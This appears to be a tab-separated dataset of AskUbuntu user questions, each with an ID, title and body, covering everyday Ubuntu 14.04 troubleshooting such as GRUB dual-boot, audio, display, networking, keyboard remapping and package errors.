496585	how to install aircrack	can i get help installing aircrack-ng-1.2-beta3/aircrackng-1.1 in a detailed form ? im using ubuntu 14.04 .
496586	how do i put a login sound in lubuntu 14.04 ?	i have lubuntu 14.04 installed on my machine , but how do i put a custom login sound in it ? i prefer the boot sound from old versions like 5.10 & 6.06 , are they still in ubuntu , and how about lubuntu ? if so , how do i enable them ? and , can i also put a shutdown sound ?
496592	wired ethernet no traffic count	my 1000mbit ethernet does n't show any traffic count anymore since reinstalling with 14.04 . with 12.10 everything was fine . neither in ifconfig nor gnome-system-monitor shows any traffic . but the network is working fine . the wireless network is counting traffic as it should ( but it 's disabled now ) $ ifconfig eth0 link encap : ethernet hardware adresse xx : xx : xx : xx : xx : xx inet adresse:192.168.0.xxx bcast:192.168.0.255 maske:255.255.255.0 inet6-adresse : xxxx : :xxxx : xx : xxxx : xxxx/64 gültigkeitsbereich : verbindung up broadcast running multicast mtu:1500 metrik:1 rx-pakete:0 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:0 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:0 ( 0.0 b ) tx-bytes:0 ( 0.0 b ) interrupt:16 lo link encap : lokale schleife inet adresse:127.0.0.1 maske:255.0.0.0 inet6-adresse : : :1/128 gültigkeitsbereich : maschine up loopback running mtu:65536 metrik:1 rx-pakete:87586256 fehler:0 verloren:0 überläufe:0 fenster:0 tx-pakete:87586256 fehler:0 verloren:0 überläufe:0 träger:0 kollisionen:0 sendewarteschlangenlänge:0 rx-bytes:14139377083 ( 14.1 gb ) tx-bytes:14139377083 ( 14.1 gb ) $ lspci | grep ethernet 03:00.0 ethernet controller : qualcomm atheros ar8161 gigabit ethernet ( rev 08 ) 05:01.0 ethernet controller : qualcomm atheros ar5212/ar5213 wireless network adapter ( rev 01 )
496594	remote desktop connection from windows to ubuntu connects , but is a black and white checkerboard screen	i need help please , everytime i attempt to connect to my ubuntu server i do , but it comes up as a black and white checkerboard .
496598	apple a1243 wired keyboard not working	keyboard apple ( us ) a1243 ; rated 5v dc . 1a max is fine ( & its also brand new ) . it works on another computer . initially intermittently worked on this current laptop as well . output from syslog when i plug in the keyboard : usb 3-3 : new high-speed usb device number 3 using xhci_hcd usb 3-3 : new usb device found , idvendor=05ac , idproduct=1006 usb 3-3 : new usb device strings : mfr=1 , product=2 , serialnumber=3 usb 3-3 : product : keyboard hub usb 3-3 : manufacturer : apple , inc. usb 3-3 : serialnumber : 000000000000 hub 3-3:1.0 : usb hub found hub 3-3:1.0 : 3 ports detected usb 3-3 : usb disconnect , device number 3 lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 17ef:6020 lenovo bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 138a:0018 validity sensors , inc . bus 001 device 004 : id 05c8:033a cheng uei precision industry co. , ltd ( foxlink ) bus 002 device 003 : id 8087:07da intel corp. update : xinput output ( apple keyboard is mysteriously working now - as mentioned above ) ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ lenovo 2.4g wireless lenovo wireless optical mouse n3903 id=9 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=12 [ slave pointer ( 2 ) ] < br > < br > ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] < br > ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] < br > ↳ power button id=6 [ slave keyboard ( 3 ) ] < br > ↳ video bus id=7 [ slave keyboard ( 3 ) ] < br > ↳ video bus id=8 [ slave keyboard ( 3 ) ] < br > ↳ hp truevision hd id=10 [ slave keyboard ( 3 ) ] < br > ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] < br > ↳ hp wmi hotkeys id=13 [ slave keyboard ( 3 ) ] < br > ↳ apple inc. apple keyboard id=14 [ slave keyboard ( 3 ) ] < br > ↳ apple inc. apple keyboard id=15 [ slave keyboard ( 3 ) ] < br >
496599	xmodmap resets when chancing window	allways when chancing active window , my xmodmap-bindings reset . i 've removed keyboard layout switcher but it wo n't help . how can i make them stay ? using ubuntu 13.10 .
496600	is is possible to have one computer rendering screen and providing cpu-ram for 2 or 3 other computers that act as client , rendering the output ?	i have several computers with 2 and 4 gb ram , not upgradeable anymore , with decent 1080p monitors that in terms of cpu are starting to show their age . my job is basically office desktop usage . i do not require a lot of cpu resources , but 4gb ram is starting to be insufficient to me . is it possible/crazy to buy a new computer , let 's say amd a10-7850k or i7-4770k with fast 16gb or 32gb ram and get it to act as some kind of server using it 's cpu resources , rendering the screen ( for each client ) , and using its ram and sending the rendered screen through gigabyte ethernet to the old computers , who would only display the screen rendered by the main computer ? so the old ones basically only display video sent by the server and provide input from mouse and keyboard . so the main computer is really the only one who runs libreoffice , gimp , the webbrowser , the file manager , produces sound , uses its ram , renders the screen , and accesses hard disk . the clients only display the image rendered by the server and provide input from mouse and keyboard i do not know very much about vnc , but i guess this would be similar to vnc but serving several computers at the same time . is is possible ? what would i need ( programs ) and how to set up the network ? linux is multitask and multiuser , how could i make use of it so i have to buy only 1 very powerful computer ? thanks in advance .
496607	no sound from right speakers	i have creative sound blaster live 24-bit sound card and 5.1 surround speakers . front & rear left , center speakers are working but no sound from right speakers ( both front and rear ) . there is no hardware problem and they work in windows 7 . how can i solve this problem ? edit : in pavucontrol , it 's seen that system sound is mono . i think that this is the reason of my problem but how can this be solved ?
496611	wireless hardware switch problem	i have a dsl connection at home so i had no reason to use wifi for a while now i realised that my wireless adaptor is switched off by hardware switch and i cant figure out how to turn it back on : ( if i start in recovery mode , its all fine ... i 'm really curious as to why its behaving like this when i was on 13.10 it worked fine but since upgrading to 14.04 my wifi has a mind of its own i have tried many tutorials , reloaded original bios conf , searched many forums for a solution but all in vain .
496613	i can not use live dvd or usb or install	i tried to install ubuntu from a dvd-r without success . it would start to boot and then it would go to a blank screen with diagonal lines . i 've verified the md5sum and then verified the disk when i burned it . i 've tried several different linux programs and have the same or similar problems with all of them . i also tried to install using wubi with no luck . i 've ran disk checks . i 've tried to install using a live usb , and ca n't even get one to load to try the program . i 've also tried to open in a virtualbox , where i got the error kernel requires x86-64 cpu , detected i686 cpu . so after getting this message , i downloaded a 32 bit version of kubuntu , put it on a usb and tried that . still no luck , it would start to load and then the blank lined screen again . my system is a windows 7 64 bit amd processor . if anyone has any suggestions , i 'm at a loss . thanks !
496615	hdmi issue with macbook pro 8,1 on ubuntu 14.04	i have a macbook pro ( mbp ) 8,1 osx version 10.7.5 , and i 'm am running ubuntu 14.04 i have been trying to connect my mbp to my tv with my hdmi cable but it seems like ubuntu does not detect anything and i can not see any change whether it is on the tv or laptop . i know it must have to do with drivers but i 'm lost i do n't know what software/drivers to install to make it work .
496618	how to configure grub	hi friends myself mukesh and i want your help to solve my problem . i have installed ubuntu 14 on my hcl desktop with legacy bios support . it was working fine till yesterday when i installed windows 8 on the same system to make dual boot . my ubuntu would not boot but windows 8 was working fine , so i installed grub with ubuntu live disk support , with the command line as below : sudo mount /dev/sda1 /mnt sudo chroot /mnt sudo grub-install /dev/sda sudo umount /mnt sudo reboot after this , grub shows ubuntu to load but it does not hav an option for windows8 to load . so now ubuntu is working fine but i am not able to start windows8 . how can i edit grub to boot both from ubuntu and windows 8 ?
496620	is there a better alternative to gnumeric ?	i opened a bounty to this question . until someone answers it , i have to assume that gnumeric can not swap rows . this is an excel , .ods file . suppose column a is n't sorted , i want to sort the entire file based on column a , like so 35 24 34 24 23 24 13 34 12 21 34 21 45 35 36 22 24 25 26 14 13 i want to sort it like so 34 12 21 34 21 45 35 35 24 34 24 23 24 13 36 22 24 25 26 14 13 is there a software capable of doing that in the linux world ? is there a software like excel , like gnumeric , but slightly more powerful , capable of doing some statistics and finding duplicate rows , stuff like that ?
496623	diagnosing crashing problems	i 'm running the latest version of 14.04 lts on my laptop and have been having frequent crashing problems . i know it 's not actually the os that is causing the problem because i was having crashing problems with windows but rather , things like overheating and system strain . are there any programs that will run in the background and dump a legible crash report after i boot back up ? also is there a way to monitor temps over time ? for instance see a whole day or week instead of real time . thanks for your help ahead of time ! system specs : mem- 7.7 gib , intel® core™ i5-2450m cpu @ 2.50ghz × 4 , intel® sandybridge mobile graphics , 729.9 gb disk , and ubuntu 14.04 lts 64-bit
496624	launching firefox leads to display issues	i 've just installed ubuntu 14.04 for the first time . i 'm using a pc chips motherboard , amd 64 bit processor with 2 gigs of ram . after logging in i see the desktop , but when i open firefox i get a bunch of small images instead of what you 'd expect with firefox . i tried going into recovery mode , grub says that it is loading , but then it goes to my login . this means i ca n't try the fixes listed for a grub recovery . any ideas ? i 've been unable to find anything on the net that works , and i 've been trying now for 5 hours . 7/12/2014 i downloaded peppermint 5.0 , it runs just fine on this pc , looks a lot like win xp , i 'm new to linux , guess i 'll try this for a while ... 15 minutes later , spoke too soon , i had to re login into peppermint , and when i hit chrome browser button at the bottom of the screen , i got garbage display again , just like ubuntu , a 100 or so mini screen images ... i got peppermint fixed , went to software / drivers / additional and replaced x.org x server nouveau with listed driver geforce 6150se nforce 430 from online down load , all is well now
496625	how to make my mtp device to appear with the same name every time ?	on my old system , ubuntu 12.04 , i could find my nexus 4 at ~/.gvfs/mtp . same place every time . very nice , making it possible to reach it through bash scripts very easily . on my new system , ubuntu 14.04 , the exact path is different every time . for example now , i can find it at /run/user/1000/gvfs/mtp : host= % 5busb % 3a001 % 2c005 % 5d/ , but tomorrow it could be something like /run/user/1000/gvfs/mtp : host= % 5busb % 3a002 % 2c008 % 5d/ or something . this seems utterly stupid to me , so i am pretty sure there is a very easy way to get around this , so how do i do that ? can i give my nexus some kind of ”label” or something ? for instance , i can always find my backup hdd at /media/backup ( when connected ) since i labelled the disk ”backup” . can i do something similar with my android device ? or is there an even better way to get around this ?
496626	computer , home and trash icon appears	after i restarted my computer with ubuntu 14.04 on it a computer , a home , and a trash-icon appeard on my desktop . how do i remove them ? i already tried it with gconf , but that did n't work . thanks
496627	xfce panel icons shift	after adding some launchers and indicators to my xfce panel - the panel now shows this huge empty space on the right side . normally , all these icons would be aligned to the right and the center space is used to show which applications are open . this is n't the case anymore - when no apps are open , these icons shift left . how can i restore the previous behaviour ?
496629	chromium/chrome not working in ubuntu 14.04	i have just installed ubuntu 14.04 lts to my dell inspiron with intel core i7 . everything is ok except the chromium . i completed the installation successfully from the software center . however when i try to launch it , nothing happens . actually , it is running at the background but not displayed . i tried to reinstall it and also restarting my laptop . but , nothing changes . then i removed the chromium and setup the google 's chrome . unfortunately , my problem is the same . can anybody help me ? thanks in advance .
496630	failed to load the package list ubuntu 14.04	when attempting to install sublime text 3 , i get this message . failed to load the package list this is a serious problem . try again later . if this problem appears again , please report an error to the developers . e : could not open file /tmp/aptdaemon-frozen-statusmx1qx95l/status - open ( 2 : no such file or directory ) , e : the package lists or status file could not be parsed or opened . how can i solve this problem . i 'm using ubuntu 14.04 trusty on a live usb .
496632	sudo : unable to stat /etc/sudoers : no such file or directory - file exists	i am one of a few people managing a gaming server . the server is currently running ubuntu 14.04 , which was installed just 3 weeks ago . everything was running fine until a few days ago , we 've had a few issues . i suspect someone hacked into our ssh server and managed to seriously mess something up . when i try to execute the command sudo i get the following error : sudo : unable to stat /etc/sudoers : no such file or directory so first thought is the file got deleted and just needs to be recreated , however ls /etc/ shows that the sudoers file already exists . furthermore , when edited with nano ( my preferred editor ) it becomes apparent that the file is completely in tact and formatted correctly . ls -l also shows that the sudoers file has the permissions -r -- r -- -- for user root and group root , which from research should be completely sufficient for sudo to be able to read the file , to make sure temporarily i gave the file -rwxrwx -- - for root root ( were using tmux for session control and we already had a session up as root ) , still failed . so the file exists , the content inside of it is correct , it has the proper permissions . what else could it be . i looked a bit at people who have had similar problems here on askubuntu.com , one solution i found that sounded hopeful , was to back up the sudoers file , then use : apt-get purge sudo apt-get install sudo and then replace the new sudo file with the old one . this did not work unfortunately . to rule out farther that the sudoers file did n't have errors , i tried the solution again , and tried executing just sudo with the newly created sudoers file , and got the same error . -- -- -- -- edit -- -- -- -- for anyone interested in what the supposed non-existant sudoers file contains , here is a filtered version ( usernames filtered ) by request : http : //paste.ubuntu.com/7781967/
496636	list directory name of symbolic link	i am trying to find all the symbolic links on my system with name keytool . i use the below command : ls -lr | grep keytool it gives some results , but i want the directory names as well . so i use the -d option : ls -ldr | grep keytool but this gives me no results at all . this is probably because of the behaviour of -d option as described by -- help : -d : list directory entries instead of contents , and do not dereference symbolic links so how do i get the directory names of the symbolic links ?
496639	looking for ubuntu 14.04 drivers for hp m8034n	looking for ubuntu 14.04 drivers for hp m8034n . i have spent many hours trying to find drivers for this computer and was not able to find any . i am particularly looking for the audio drivers . i have already tried to uninstall/reinstall audiopulse and alsamixer . this did not fix the issue . any help would be greatly appreciated . thanks again for anyone 's help .
496640	how to extend ext partition of ubuntu	i 've dual booted ubuntu in pc by shrinking the c : drive actual size of c : drive ntfs is 100 gb and ext partition is 15 gb now i 'm thinking to extend the size of ext where ubuntu is installed without shrinking the c : drive because my c : drive is completely full . i 've tried to shrink the remaining drives like e , f ... . but they unallocated spaces is accessable while extending ext of ubuntu .. please help
496644	how can i apply different fonts to different scripts across ubuntu ?	the default font does not support the devanagiri script which is used to write hindi . even so hindi file-names in nautilus and bookmarks in firefox display fine . i am guessing it defaults to using lohit-hindi typeface . i want to use the `` noto sans devanagiri '' typeface instead . how can i accomplish this ? please note that i do not want the system ui to support the hindi language , which i am aware can be done via system settings by adding support for preferred language . i just want to be able to assign a system-wide typeface to be used for all text that falls in the devanagiri code-point .
496645	ubuntu 14.04 gnome touchpad gestures	i want to extend the touchpad gestures of the system , i 've ran into touchegg but in my case it did not work . i 've read its not working on ubuntu 14.04 gnome environment . any help is appreciated . i want to approach os x like gestures . i am using a lenovo u330p laptop .
496646	randr extension is too old- using xrdp to log into ubuntu 14.04 with mate desktop	i 've got a rather hackneyed setup in order to run an ubuntu 14.04 vm on my laptop ( lenovo yoga 2 pro with 3200x1800 resolution screen ) with hyper-v . unfortunately , the screen resolution is so high that even after modifying grub 's parameters and working some magic with hyper-v 's drivers on ubuntu , i still ca n't get full screen . the solution that has `` worked '' best so far has been to run the vm and log into it using windows ' rdp client and xrdp on the vm 's side . i originally tried this using the standard unity desktop , but xrdp does n't seem to support that . i then switched to xfce and then to mate 1.8 . while these offer a full-screen client ( which looks gorgeous , btw ) , i notice that most of the stuff scales for crap . i figured i 'd try and go into the display settings to fix this , but when i do so , i get some variation ( depending on whether i 'm using xfce or mate ) of the following : could not get screen information : randr extension is too old ( must be at least 1.2 ) . what 's going on , and can i fix it ? honestly i 've gotten more than i 've bargained for on this whole `` running 14.04 in a vm '' project already .
496651	why is root running java	just noticed that root is running a process named java . is there really an ubuntu system level process that necessitates this , or is this a sign of some rouge software or incorrect installation of a package ?
496652	how can i focus terminator ( a terminal emulator ) with a key from anywhere ?	i 'm currently using guake on my main monitor , which has a very nifty feature of allowing you to press a key at any time to show and focus the terminal . i 'm running terminator on a second monitor , and i 'd like to get similar functionality with another key . i 've searched its preferences and ca n't find such a function , is there another way to accomplish this ? i 'd like to be able to press a certain key combo anywhere to focus/un-focus terminator .
496656	multiple problems with grub disk partitions ubuntu login after update	story : i have some problems which began with the lost+found folder and space which i could not get rid of even after i did dd ( from live sdcard ) with complete zero overwrite to the whole disk and later shred with 3 random overwrites and 1 zero to the whole partition ( the whole disk ) except the hidden extra gigabytes the disk is 500gb ( i have about 466gb and the rest 34gb are hidden ) the folder lost+found is displayed as 0 items and empty by nautilus before i formatted the disk i tried to install ubuntu on one partition which was about 30gb and had used up space of about 600mb ( as shown in gparted ( screenshots ill provide in a while when i boot from livecd as guest cant do anything ) ) it installed normally everything worked restarted loged in than updated as i copy pasted my previous home folder ( pretty nice trick to save all your program settings when installing new system ) than updated the os and restarted so updates could take place at the time i noticed grub was not displayed and directly booted ubuntu ( on the previous restart i noticed that theres an edge of about 5-10 px around the corners with the default colour and theres a whole black box in the centre where grub gui should be ) after that i tried to log in but i was immediately kicked back to login screen than i read about ctrl + alt + f2 gdm reconfigure and tried it with no result ( when i log in from there a error message is displayed at the end of the lines `` -bash : /usr/bin/byobu-launch no such file or directory '' ) ( on the last restart it was the same ) in my opinion all of this is caused by lost+found and the unknown space as the whole thing started from it as i deleted empty lost+found folder note : i never saw anything in these folders no mater how many times they were created later after i formatted the disk with dd i created ext2 part to see if they were gone but what i saw - 6gb of taken space and an empty lost+found questions : 1 : how to remove lost+found along with the used up gigabytes from the disk note : when i was monitoring the shred process i noticed some processes with names migration/0 migration/1 ... with root permissions of them the migration/0 was active a lot and in a minute there were a lot of moments it reached 100 % cpu usage and watching the system monitor graph at least 1 of the 2 cpus were at 100 % almost 90 % or so of the time ( they were practically changing every 30 seconds or so from 100 % to about 10-15 % ) else the other processes were shred with stable 5 % and later 6 % firefox with no usage and an average of 8 % and gnome-systemmonitor with max of 13 % from time to time so at one point i started thinking this migration/0 is moving the megabytes during the format and later returning them back or not 2 : how to repair grub ( may repair itself after space of lost+found is free space again ) ? 3 : how to be able to log in after software update some technical info of my laptop if it will be of any use acer aspire 5732z intel pentium dual core t4400 2.2ghz 3gb ram gpu is intel chipset gma45 disk wd 500gb scorpio black bought about year and 4 months ago ( 29.03.2013 ) i was thinking of trying creating live cd of a program with fancy name like dban that will just dd the disk and try it with no migration/0 process http : //i.imgur.com/pagu97a.png
496657	apt-get update , apt-get install not working	i installed ubuntu server 14.04 on virtual box and installed lamp , webmin and ftp then suddenly i could not install any thing else because the initiation to connect to us.archive.ubuntu.com is not happening . the error that i get is failed to fetch http : //us.archive.ubuntu.com can not initiate connection to us.archive.ubuntu.com:80 [ ip ] - connect ( 101 network is unreachable ) when i do ifconfig auto up it gives me the error : error while getting interface flags : no such device .
496658	how to fix : running skype ( or other apps ) effects chrome gpu process crash ?	i 've read over the net that this is a common issue , however not necessarily connected to skype or amd . the issue being chrome gpu process crash = slower net browsing . chrome : //gpu log messages [ 3959:3978:0707/180751 : error : gpu_watchdog_thread.cc ( 253 ) ] : the gpu process hung . terminating after 10000 ms. gpuprocesshostuishim : the gpu process crashed ! [ 5009:5014:0707/180809 : error : gpu_watchdog_thread.cc ( 253 ) ] : the gpu process hung . terminating after 10000 ms. gpuprocesshostuishim : the gpu process crashed ! [ 5021:5026:0707/180821 : error : gpu_watchdog_thread.cc ( 253 ) ] : the gpu process hung . terminating after 10000 ms. gpuprocesshostuishim : the gpu process crashed ! warning : hardware acceleration is unavailable . ... and at the command terminal esamo @ es-mob : ~ $ /usr/bin/google-chrome-stable [ 29261:29261:0708/172431 : error : component_loader.cc ( 138 ) ] failed to parse extension manifest . [ 29261:29261:0708/172432 : error : desktop_window_tree_host_x11.cc ( 1289 ) ] not implemented reached in void views : :desktopwindowtreehostx11 : :mapwindow ( ui : :windowshowstate ) libgl error : open uki failed ( operacja niedozwolona ) libgl error : reverting to ( slow ) indirect rendering [ 29261:29261:0708/172442 : error : profile_sync_service.cc ( 1270 ) ] history delete directives datatype error was encountered : delete directives not supported with encryption . [ 29261:29481:0708/172443 : error : get_updates_processor.cc ( 214 ) ] postclienttoservermessage ( ) failed during getupdates i 've created chrome bug ticket where 's more info ( gpu , flash , hardware ) : https : //code.google.com/p/chromium/issues/detail ? id=391620
496659	hide gnome launch bar following a launcher click	i looked on the site , but found no match . i looked through compiz settings manager but did n't see anything that would help me . using 14.04 lts with gnome installed . i ca n't remember where of if there 's a location to set the behavior for the launch bar so that following the click of a launcher from the bar , the launcher bar will disappear . currently , if i click and leave the mouse atop the launcher i clicked , the launch bar remains visible . i 'd like to have it slide away following a launcher icon click . thanks .
496660	is there any way to change the `` invalid password , please try again ' text ?	i wanted to change the `` invalid password , please try again ' text to `` permission denied ... and ... you did n't say the magic word ! '' is this even possible ?
496665	libnetfilter packet receive	i have a simple emulator which receives queued packets from the kernel nfnetlink_queue subsystem . handling of incoming packets can be done via a loop using recv ( ) function : ( for more info , see here . an example code is here : http : //www.netfilter.org/projects/libnetfilter_queue/doxygen/nfqnl__test_8c_source.html ) fd = nfq_fd ( h ) ; while ( ( rv = recv ( fd , buf , sizeof ( buf ) , 0 ) ) > = 0 ) { printf ( `` pkt received\n '' ) ; nfq_handle_packet ( h , buf , rv ) ; } what does recv ( ) function return ? i am facing with a strange issue : when it is working correctly , recv ( ) returns 1552 , suddenly it gets 120 , and for the next iteration , it gets -1 meaning no packets to receive ! i have a udp sender on the same machine which is continuously generating packets , so -1 shall not be correct ! ! any opinions ? in general , where can i get more info about recv ( ) , and if it is a part of libnetfilter ?
496669	ubuntu 12.04 can not connect to starbucks free attn wifi , dns issue	first off , i 'm a bit of a newbie and networking stuff is not my forte . so i 've been pulling my hair out for the last hour trying to get my 12.04 ubuntu partition to connect to an at & t hotspot in starbucks . i have switched to my windows partition on the computer so that i can get some work done . this happens every one in a while when i try to connect to public wifi and i think it relates to something with dns going awry when i need to be rerouted to accept free wifi terms and conditions . behaviour : the wifi indicator says it 's connected and has a strong signal , but i get a generic `` not connected '' when trying to access google through chromium . my phone and windows partition both connect , so something is up with ubuntu . things i 've tried : tried firefox , same message pinging www.google.com says that the dns server ca n't resolve the name or something similar . pinging 8.8.8.8 gets a response . restarted via /etc/init.d/network-manager restart logged in , logged out restarted machine found the ip address of what i think it the router . it redirects to the correct web address of the page where i would click the agreement for lawfully using starbucks wifi , but shows an error message in the browser , which say something like `` unable to resolve the server 's dns '' renamed the /etc/resolv.conf file , then moved it back when doing so did n't do anything ( as per can not access internet ( dns names do not resolve ) after update today ) commented out dnsmasq and then uncommented it ( as per : http : //www.ubuntugeek.com/how-to-disable-dnsmasq-in-ubuntu-12-04precise.html ) went in to the chromium settings and fiddled with a bunch of privacy settings ( un-checking `` predict network actions to improve page load performance '' was suggested by chromium . it was already unclicked ) in the gui network manager for the attn network , tried turning off auto everything and manually putting in the server name for the dns server ( no idea if this makes any sense , was kind of flailing at this point ) ran this command : sudo dpkg-reconfigure resolvconf , which was a little scary ... hope i did n't mess anything up . ( as per : http : //oct.im/auto-dns-resolving-in-ubuntu-1204-desktop.html ) it 's a little tough to talk on-line and troubleshoot , since i 've only got one machine and i can get on-line but it involves rebooting on a windows partition . any suggestions and/or advice would be very appreciated ! thank you !
496670	remap keycodes after adding bluetooth keyboard	i 've used xmodmap to remap keys for bluetooth keyboard in ubuntu 14.04 : xmodmap ~/.xmodmap remove mod1 = alt_l remove mod1 = alt_r keycode 180 = alt_l keycode 225 = alt_r add mod1 = alt_l add mod1 = alt_r but mappings reset next time bluetooth keyboard connects . how to make mappings permanent or reenable them on connecting device ? update : i 've found that going to tty and back to xsession also breaks xmodmap settings , this line prevents breaking in tty case : gsettings set org.gnome.settings-daemon.plugins.keyboard active false but it 's not an option since it breaks switching language layouts , while icon still shows language correctly . reconnecting keyboard also resets xmodmap settings .
496671	win8 wo n't open after instaling lubuntu 14.04 ; infinite loop in grub	on my hp laptop with windows 8 , i installed lubuntu as a dual boot from a live cd . at first , i could only access grub through hitting f9-ubuntu , so i tried boot repair to no avail . then i tried manually loading grub 's mbr file where windows ' was , but it did n't help . i tried turning off secure boot in the bios ( uefi ) , and it opened grub straight away . however , when i try to open the windows option , it flashes black and the same menu comes up , no matter how many times i hit it . when i turn secure boot back on , it repairs win8 and i can boot into it until i turn it off again . i have tried fixing grub , fixing the bcd from the windows side through recovery and through third party apps , and tried every permutation of all this at least once . all i want is for my computer to open grub , give me a choice between lubuntu and windows , and boot the one i ask for . this is a last ditch effort ; i 've been working on this about 12 hours straight to no avail . if anybody can help , i would really , really appreciate it ! : )
496673	is there a way to change gnome wallpaper change from fade effect to crude replace ?	i 'm user of wallch . wallpaper changing makes my 2x 2 ghx proc choking if the video is being played at the time . or put programming work instead of watching video , that results delayed actions . i 've reported the bug to wallch devs https : //bugs.launchpad.net/bugs/1340980 and it seems depended on gnome , not wallch . i 'd be glad for a way to simply disable fade effect for wallpaper change . edit : for now i 've given up and just modified wallpaper change delay to 2 hours ... no answers : ( .
496677	upstart script not working ugh ! so frustrating !	here is a copy of my conf file description `` ncurses bittorrent client based on libtorrent '' console none expect fork kill timeout 30 start on ( local-filesystems and net-device-up and runlevel [ 2345 ] ) stop on runlevel [ 016 ] script exec /usr/bin/screen -d -m -s rtorrent /usr/bin/rtorrent end script pre-stop script exec killall -w -s 2 rtorrent end script when i run the commands in terminal , they work fine . when i run them with sudo initctl start rtorrent sudo initctl stop rtorrent they just hang when i run them from the terminal and dont work on boot . i 'm sure it 's just a small problem but i 've tried to fix it for the last 3 hours and i 'm out of ideas .
496678	getting an error message for updates	i am getting an error message e : type ' -2014-07-10 ' is not known on line 1 in source list/etc/apt/sources.list d/playonlinux.list . any suggestions on how to fix this ? it wo n't let me report this error or anything . i am using ubuntu 12.04 lts thanks in advance !
496679	libreoffice saves slow and pauses on first save with ubuntu 14.04	i 'm experiencing some strange behavior with libre office on ubuntu 14.04 . this applies to both the version bundled with 14.04 , and the latest version from the libre office website . when i open libre office writer and start working on a brand-new document and save it , the first save takes a really long time and the window grays out . after a while the save finishes and the window starts responding again . but when i continue typing the document , it pauses a second or so for every few words . if i close libre office then open it again and open the document i saved before and start working on it , it saves normally and works normally . this issue only occurs when saving a document for the first time .
496680	recent update in ubuntu 14.04 resulted in my external monitor being unable to go above 1024x768 without being met with a black screen/no signal	this is all through hdmi . i can not go above 1024x768 or i get a black screen / no signal . this means anywhere between 1152x864 and 1920x1080 ( which is what i had been set at before the issue ) . 1024x768 is n't exactly pretty to look at - lines and graphical glitches all over the place . 800x600 and 720x576 work as well , again with the same graphical errors . i suppose a good start is xrandr at 1920x1080 : xrandr screen 0 : minimum 320 x 200 , current 3286 x 1080 , maximum 32767 x 32767 lvds1 connected primary 1366x768+1920+312 ( normal left inverted right x axis y axis ) 344mm x 194mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 598mm x 336mm 1920x1080 60.0*+ 50.0 50.0 50.0 59.9 1920x1080i 60.1 50.0 60.0 1280x1024 60.0 1440x900 59.9 1280x800 59.9 1152x864 75.0 1280x720 60.0 50.0 59.9 1024x768 70.1 60.0 800x600 60.3 56.2 720x576 50.0 720x480 60.0 59.9 640x480 66.7 60.0 59.9 720x400 70.1 dp1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) xrandr sees it , the screen display sees it - hell , if i open up a workspace i can see the windows being opened there ( i have to move them back to my laptop display ) . no clue what the issue could be . maybe xorg.conf ? it 's blank at the moment - might i have to add something in ? as for my card - intel 4000 and nvida 630m .
496681	accidentally deleted windows while installing ubuntu , not able to get it back please help !	i used ubuntu via live cd on my lenovo laptop which had windows 8.1 installed on it . then i decided to install ubuntu and while doing that i accidentally click next when it said wipe windows and install ubuntu , after which my whole hdd got formatted in some weird partition and all my data ( 250 gb ) got lost . so i tried putting my hdd in an external case and connecting it to another laptop to recover my data with software like ( get data back ) but when i connected my laptop hdd to another computer and went to management page to initialize the disk it keeps showing data redundancy error , i 've tried every single way to get my hdd showing on windows but its not working . although it still shows in ubuntu which means my hdd is in good state , so can someone please tell me how to get my windows partition back so that i can recover my data ?
496683	how do i make a hybrid juju-quickstart ?	my question is when using the juju-quickstart , how can i configure it so that a cloud service provides the ip address and storage , while i handle memory and cpu ?
496693	how do you append to environment variable in upstart ?	i put the following in my /etc/init/myjob.conf file but it does n't seem to work env path= $ path : /mnt/data/src env pythonpath= $ pythonpath : /mnt/progs/link is it possible to somehow append to an environmental variable .
496699	14.04 recognizes linksys wpc54g , but is not listed	i used the additional drivers feature to enable the broadcom drivers . i rebooted , but i am still unable to use my wireless card . i assumed it would just appear in the list of devices in the networking menu at the top of the screen , but it does not . i feel like i am close because it does recognize the device and says it 's using the correct driver . what am i missing ? boo @ bit-master : ~ $ lspcmcia boo @ bit-master : ~ $
496700	python 3.4 import error on gi._gi	in python 3.4 i get importerror : no module named 'gi._gi ' after trying from gi.repository import gtk though i did sudo apt-get install python3-gi previously from terminal . does anyone know how to solve this problem ? update : did some checking around and noticed in the error that i get after failing to import that it appears to be trying to pull from python3 which is linked to 3.2 and not 3.4 but not sure how to fix this . > > > from gi.repository import gtk traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > file `` /usr/lib/python3/dist-packages/gi/__init__.py '' , line 23 , in < module > from ._gi import _api , repository importerror : no module named 'gi._gi' if i do a python3 at the terminal , i get python 3.2 interpreter . if i attempt the import , it is successful , however if i exit ( ) and then enter python3.4 i can not import . i tryed a sudo apt-get remove python3.2-minimal and sudo apt-get remove python3.2 ' followed by a reinstall of python3.4 and a 'sudo ln -s python3.4 python3 ' afterwards i installed python3-gi again and noticed that it pulls in python3.2 that i just removed . how do i install python gi for version 3.4 and not 3.2. aapt-cache search python gobject` does not indicate a python3.4-gi that i would expect .
496702	error message when creating a shared folder	i log in as administrator , but i get this message when i try to create a shared folder : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error permission denied you do not have permission to create a usershare . ask your administrator to grant you permissions to create a share . how do i give myself full permissions ?
